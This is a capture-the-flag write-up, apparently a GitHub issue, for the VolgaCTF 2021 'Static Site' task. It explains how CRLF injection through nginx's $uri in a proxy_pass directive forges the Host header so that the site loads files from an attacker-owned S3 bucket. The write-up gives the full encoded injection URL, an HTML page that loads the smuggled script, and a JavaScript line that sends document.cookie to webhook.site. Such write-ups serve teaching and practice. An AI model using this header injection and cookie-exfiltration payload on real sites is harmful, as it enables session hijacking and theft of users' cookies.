VolgaCTF 2021 Qualifier - Static Site
aszx87410 opened this issue · comments
Static Site
Description
nginx config
server {
listen 443 ssl;
resolver 8.8.8.8;
server_name static-site.volgactf-task.ru;
ssl_certificate /etc/letsencrypt/live/volgactf-task.ru/fullchain1.pem;
ssl_certificate_key /etc/letsencrypt/live/volgactf-task.ru/privkey1.pem;
add_header Content-Security-Policy "default-src 'self'; object-src 'none'; frame-src https://www.google.com/recaptcha/; font-src https://fonts.gstatic.com/; style-src 'self' https://fonts.googleapis.com/; script-src 'self' https://www.google.com/recaptcha/api.js https://www.gstatic.com/recaptcha/" always;
location / {
root /var/www/html;
}
location /static/ {
proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
}
}
index.html
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>Static Site</title>
<link rel="stylesheet" href="./static/bootstrap.min.css">
</head>
<body class="text-center">
<div class="cover-container d-flex h-100 p-3 mx-auto flex-column">
<header class="mt-5">
<h3 class="masthead-brand">Static Site</h3>
</header>
<main role="main" class="mt-5">
<p class="lead"><img src="./static/hacker.gif"/></p>
<p class="lead pt-5">
Ok, hackers, I created a static site with a strict Content-Security-Policy.
</p>
<p class="lead">
It is simply impossible to steal my cookies now!
</p>
<p class="lead">
But, you can still try:
</p>
<p>
<form id="form" class="form-inline justify-content-center" method="POST" action="https://bot-static-site.volgactf-task.ru/">
<div class="form-group">
<label for="url">URL</label>
<input type="url" name="url" id="url" class="form-control mx-sm-3">
<input type="submit" class="btn btn-secondary g-recaptcha" data-sitekey="6LdN230aAAAAAPsMXHWZ9szidC6tbkSzWDarMqmL" data-callback="onSubmit" data-action="submit">
</div>
</form>
</p>
</main>
</div>
<script src="https://www.google.com/recaptcha/api.js"></script>
<script src="./static/captcha.js"></script>
</body>
</html>Writeup
After review the nginx config and the html file, this part catch my eyes:
location /static/ {
proxy_pass https://volga-static-site.s3.amazonaws.com$uri;
}
Then I googled nginx $uri vulnerability and found some useful resources:
We can use CRLF injection and change the request. I am not familiar with nginx so I create an environment on my local to see how can I use it. After playing for a while I found that I can fake the Host header to read the file in my own bucket:
https://static-site.volgactf-task.ru/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:
So the solution is straightforward:
- create my own S3 bucket
- upload /static/index.html
- upload /static/app.js
- let bot visits https://static-site.volgactf-task.ru/static/index.html%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:
- XSS triggered!
html file
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
</head>
<body class="text-center">
hello
<script src="/static/app.js%20HTTP/1.0%0d%0aHost:%20ctftesthuli.s3.amazonaws.com%0d%0ayo:"></script>
</body>
</html>js file
window.location = 'https://webhook.site?c='+document.cookie